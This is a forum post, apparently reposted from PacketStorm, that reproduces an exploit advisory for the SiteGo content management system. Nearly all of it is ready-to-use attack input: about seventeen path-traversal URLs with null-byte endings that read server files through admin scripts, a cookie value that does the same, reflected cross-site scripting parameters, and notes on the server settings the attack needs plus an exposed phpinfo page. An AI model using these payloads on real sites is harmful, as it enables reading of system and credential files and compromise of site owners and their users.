Jump to content
Praetorian503

SiteGo Local File Inclusion / Cross Site Scripting

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

SiteGo suffers from cross site scripting and local file inclusion vulnerabilities.

#################################################
### Exploit Title: SiteGo Multiple Vulnerabilities
### Date: 02/07/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows 
#################################################

# Multiple Local File Inclusion :

http://127.0.0.1/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/visitors/index.php?idv=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/stylemanager/index.php?ids=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/site_reports/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/my_tools/index.php?idt=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/my_account/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/mysql/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/moderators/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/mainlinks/index.php?idl=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/linksmanager/index.php?idl=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/ipdenymanager/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/filesmanager/index.php?idf=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/feedout/index.php?idf=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/contacts/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00

Also Inject The Cookies In Main Page By This :

style_name=../../../../../../../../../../windows/win.ini%00

# XSS :

http://127.0.0.1/site-go/?action=vote&Browse=[XSS]

http://127.0.0.1/site-go/?action=MailList&articles=&B1=ãÊÇÈÚÉ&delete=[XSS]&reason=1

Many Files is affect

#######################################################

# Notes :

1- Must be magic_quotes_gpc = Off

2- phpinfo() :

http://127.0.0.1/site-go/admin/include/phpinfo.php

3- Remote File Inclusion Doesn't Fix Yet ! :

http://www.exploit-db.com/exploits/21222/

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...